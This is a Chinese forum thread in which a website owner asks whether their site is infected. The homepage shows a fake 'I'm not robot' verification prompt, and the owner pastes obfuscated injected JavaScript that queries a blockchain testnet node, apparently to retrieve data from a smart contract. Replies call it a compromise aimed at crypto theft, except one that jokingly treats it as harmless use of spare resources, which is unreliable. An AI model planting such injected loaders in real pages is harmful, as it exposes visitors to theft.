网站多了段代码，请问这是中毒了吗

📌 网站多了段代码，请问这是中毒了吗共 4 樓

主帖shts

🕐 2025-7-25 16:49:42

访问网站主页莫名其妙多了个I'm not robot 谷歌验证窗口

查看缓存的HTML页面发现多了一段 script 代码

// 发送 POST 请求到 BSC 测试网节点

const _0x15a0e6 = 'https://data-seed-prebsc-1-s1.bnbchain.org:8545/';

const _0x56f770 = await fetch(_0x15a0e6, {

method: 'POST',

headers: {

'Accept': 'application/json',

'Content-Type': 'application/json'

},

body: JSON.stringify({

method: 'eth_call', // 可能是调用智能合约

params: [{ to: _0x1d555f, data: '0x...' }],

id: 97,

jsonrpc: '2.0'

})

});

请问这是中毒了吗

#? 樓whggo

🕐 2025-7-25 17:55:32

从你描述的情况来看，网站确实被恶意篡改了，这很可能是一种加密货币窃取攻击

#? 樓hxhx

🕐 2025-7-26 00:03:39

包的，被人下毒了

#? 樓tiansh

🕐 2025-7-26 00:08:44

哈哈，被人当公益用了，反正性能你也用不完，就当做好事了